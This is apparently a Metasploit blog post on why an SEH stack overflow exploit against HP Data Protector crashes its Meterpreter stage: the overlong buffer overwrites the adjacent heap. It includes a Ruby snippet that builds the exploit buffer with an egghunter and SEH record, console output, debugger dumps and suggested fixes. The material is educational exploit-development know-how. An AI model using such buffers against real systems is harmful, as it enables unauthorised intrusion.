Last year at BSides Vegas, James Lee (egypt) and David Rude (bannedit) did a presentation about "Long Beard's Guide to Exploit Dev".  During the talk, James said one thing that I'll never forget: "exploit development is never an easy task, because pretty much every step you do -- finding the offset, finding a return value, using a ROP gadget, etc -- could lead to a failure." Ain't that the truth!  But here's the thing, exploits don't just fail before you pop a shell, it can also happen WHILE you're getting a shell... and that's where my story is.

Let's say you're writing an exploit.  You've done all the hard work to put it all together: you spent days in a debugger trying to do some decent root cause analysis for the bug, find all the bad characters, you bypass all the memory protections such as /GS, SafeSEH, you ROP it like a ROP star, and you bypass ASLR like a boss.  Your friends praise you for the accomplishment, some people might even call your exploit "sophisticated".... and then all of a sudden, this is all the "code execution" you get out of your awesome exploit:

msf  exploit(0day) > exploit
[*] Server started.
[*] Sending request to 10.0.1.4:80...
[*] Leaked address: 0x61990000
[*] Sending final payload...
[*] Sending stage (752128 bytes) to 10.0.1.4

"Hey, WTH?", you say.  For some reason the exploit fails after you've sent the second stage to the vulnerable application, and then the server crashes (this is the key behavior).  You fire the module a couple of times just to make sure, but same thing.  Your shell keeps slipping away from your fingertips... what a nightmare!  This is a pretty nasty problem, because the root cause most likely comes from the exploit.  It also can be a hassle to fix, and you will see why when you see one of the solutions in the end.  But for now, I should probably explain why this is happening.

We ran into the same problem recently while developing the exploit for HP Data Protector, so I'll use that as a case-study.  During the later stage of the development of that module, the buffer was crafted this way:

print_status("Using egghunter with checksum")  
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })  
my_payload = egg  
my_payload << "A"*(target['Offset']-my_payload.length)  
my_payload << generate_seh_record(target.ret)  
my_payload << hunter  
my_payload << "A"*(4080-my_payload.length)  

As you can see, the max buffer size is 4080 bytes -- this is key.  And then when we fire up this module, we'd see the same stage delivering message, and then hit this bug:

 
0:008> r
eax=03f664d4 ebx=3743fde1 ecx=0000c9ed edx=000c1000 esi=3743fdc9 edi=03f501a4
eip=7c952d6b esp=019ed278 ebp=019ed2ec iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlQueryProcessHeapInformation+0x2ba:
7c952d6b 8b4e14          mov     ecx,dword ptr [esi+14h] ds:0023:3743fddd=????????

0:008> k
ChildEBP RetAddr  
019ed2ec 7c953341 ntdll!RtlQueryProcessHeapInformation+0x2ba
019ed348 7c864afe ntdll!RtlQueryProcessDebugInformation+0x1ee
019ed36c 03bd7e23 kernel32!Heap32First+0x48
WARNING: Frame IP not in any known module. Following frames may be wrong.
019edc2c 7c802600 +0x3bd7e22
019edc7c 00000000 kernel32!WaitForSingleObjectEx+0xd8

We should probably point out that ESI is actually a string that's user-supplied.  We were able to determine this, because when we tested the module again with pattern_create() instead of a long string of "A"s, pattern_offset.rb was able to locate the string... exactly 38 bytes after the egghunter.  So the above WinDBG log shows that after the staged payload delivery, there is some sort of heap corruption, and evidently our string has something to do with that.

Remember, this buffer overflow is supposed to be all stack smashing. But as we examine the memory more closely by doing a non-crashy request vs the crashy one, we found something interesting.  The following is the memory dump starting where the SEH is (that we overwrite):

Stack from the healthy version of the exploit****Stack from the non-healthy version of the exploit

Stack from the healthy version of the exploit Stack from the non-healthy version of the exploit
0244ff9c d64d06eb
0244ffa0 66dd3e49 SE Handler
0244ffa4 ffca8166
0244ffa8 6a52420f
0244ffac 2ecd5802
0244ffb0 745a053c
0244ffb4 3077b8ef
0244ffb8 d7897430
0244ffbc afea75af
0244ffc0 3151e775
0244ffc4 02c031c9
0244ffc8 66410f04
0244ffcc 013df981
0244ffd0 043af575
0244ffd4 d175590f
0244ffd8 3077e7ff
0244ffdc ff007430
0244ffe0 7c839ac0 kernel32!_except_handler3
0244ffe4 7c80b720 kernel32!`string'+0x88
0244ffe8 00000000
0244ffec 00000000
0244fff0 00000000
0244fff4 1022db2c dpwinsup!Mbcsisupper+0x21d627
0244fff8 019d75a0
0244fffc 00000000 Stack
02450000 000000c1 starting here is the heap
02450004 0000017a
02450008 eeffeeff
0245000c 00001003
02450010 00000001
02450014 0000fe00
02450018 00100000
0245001c 00002000
02450020 00000200
02450024 00002000
02450028 00001f6d
0245002c 7ffdefff
02450030 06080019
0244ff9c d64d06eb
0244ffa0 66dd3e49 SE Handler
0244ffa4 ffca8166
0244ffa8 6a52420f
0244ffac 2ecd5802
0244ffb0 745a053c
0244ffb4 3077b8ef
0244ffb8 d7897430
0244ffbc afea75af
0244ffc0 3151e775
0244ffc4 02c031c9
0244ffc8 66410f04
0244ffcc 013df981
0244ffd0 043af575
0244ffd4 d175590f
0244ffd8 41414141
0244ffdc 41414141
0244ffe0 41414141
0244ffe4 41414141
0244ffe8 00000000
0244ffec 00000000
0244fff0 00000000
0244fff4 41414141
0244fff8 41414141
0244fffc 04141414 Still stack
02450000 41414141 starting here is the heap
02450004 41414141
02450008 41414141
0245000c 41414141
02450010 41414141
02450014 41414141
02450018 41414141
0245001c 41414141
02450020 41414141
02450024 41414141
02450028 41414141
0245002c 41414141
02450030 41414141

In case you haven't noticed, yes, while the exploit is overflowing the stack, it's also writing to the heap.  A simple !address command verifies this:


0:010> !address 0244fffc
     02350000 : 02440000 - 00010000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageStack
                    Pid.Tid  69a0.6ac4

0:010> !address 02450000
    02450000 : 02450000 - 00016000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   02450000
 

And clearly, the dt command shows what the corrupt heap structure 0x02450000 looks like:


     0:010> dt _HEAP 02450000
     ntdll!_HEAP
        +0x000 Entry            : _HEAP_ENTRY
        +0x008 Signature        : 0x41414141
        +0x00c Flags            : 0x41414141
        +0x010 ForceFlags       : 0x41414141
        +0x014 VirtualMemoryThreshold : 0x41414141
        +0x018 SegmentReserve   : 0x41414141
        +0x01c SegmentCommit    : 0x41414141
        +0x020 DeCommitFreeBlockThreshold : 0x41414141
        +0x024 DeCommitTotalFreeThreshold : 0x41414141
        +0x028 TotalFreeSize    : 0x41414141
        +0x02c MaximumAllocationSize : 0x41414141
        +0x030 ProcessHeapsListIndex : 0x4141
        +0x032 HeaderValidateLength : 0x4141
        +0x034 HeaderValidateCopy : 0x41414141 
        +0x038 NextAvailableTagIndex : 0x4141
        +0x03a MaximumTagIndex  : 0x4141
        +0x03c TagEntries       : 0x41414141 _HEAP_TAG_ENTRY
        +0x040 UCRSegments      : 0x41414141 _HEAP_UCR_SEGMENT
        +0x044 UnusedUnCommittedRanges : 0x41414141 _HEAP_UNCOMMMTTED_RANGE
        +0x048 AlignRound       : 0x41414141
        +0x04c AlignMask        : 0x41414141
        +0x050 VirtualAllocdBlocks : _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
        +0x058 Segments         : [64] 0x41414141 _HEAP_SEGMENT
        +0x158 u                : __unnamed
        +0x168 u2               : __unnamed
        +0x16a AllocatorBackTraceIndex : 0x4141
        +0x16c NonDedicatedListLength : 0x41414141
        +0x170 LargeBlocksIndex : 0x41414141 
        +0x174 PseudoTagEntries : 0x41414141 _HEAP_PSEUDO_TAG_ENTRY
        +0x178 FreeLists        : [128] _LIST_ENTRY [ 0x41414141 - 0x41414141 ]
        +0x578 LockVariable     : (null) 
        +0x57c CommitRoutine    : (null) 
        +0x580 FrontEndHeap     : (null) 
        +0x584 FrontHeapLockCount : 0
        +0x586 FrontEndHeapType : 0 ''
        +0x587 LastSegmentIndex : 0 ''
 

When the payload uses the heap, that's when we get the crash.  Based on our data, this crash tends to happen after the handler complets transmitting the payload (that's after recv), and then when the Tool Help Functions ends up using the bad heap (CreateToolHelp32Snapshot -> kernel32.Heap32ListFirst -> Heap32First, in particular), causing our meterpreter to crash.  We have also seen other behaviors that lead to the crash, but not too far off from the same reason.

The Solutions

Now we know for scenarios like this, the user-supplied buffer is highly likely the root cause of the problem.  In our case with HP Data Protector, the string is just way to long, and it's overwriting the heap.  We have seen a few proven solutions in the past, and here they are:

  • Avoid corrupting the heap by reducing your malicious string size.  This should be the most simple way you should try first, but may not always work well for you because a smaller size buffer may not even trigger the vulnerability you're exploiting.
  • Inject your payload somewhere else, where no heap is busted.  So far this technique has only been used once, and it was done by corelanc0d3r and lincoln.  This is similar to using the 'migrate' feature in a meterpreter, except their injection routine occurs before the actual Metasploit payload begins. You can read up more about this technique here.
  • Induce a heap pointer manually, for example: ms04_011_pct.rb

And hopefully one of the above recommendations will do the trick for you.

By the way, in case you're interested in Metasploit module development, make sure to create your development setup, and then join the sweet action of the Metasploit Project.  Github and Redmine often reveal a lot about how a module is made, and every exploit always tends to be an unique story -- great places to begin your exploit development journey!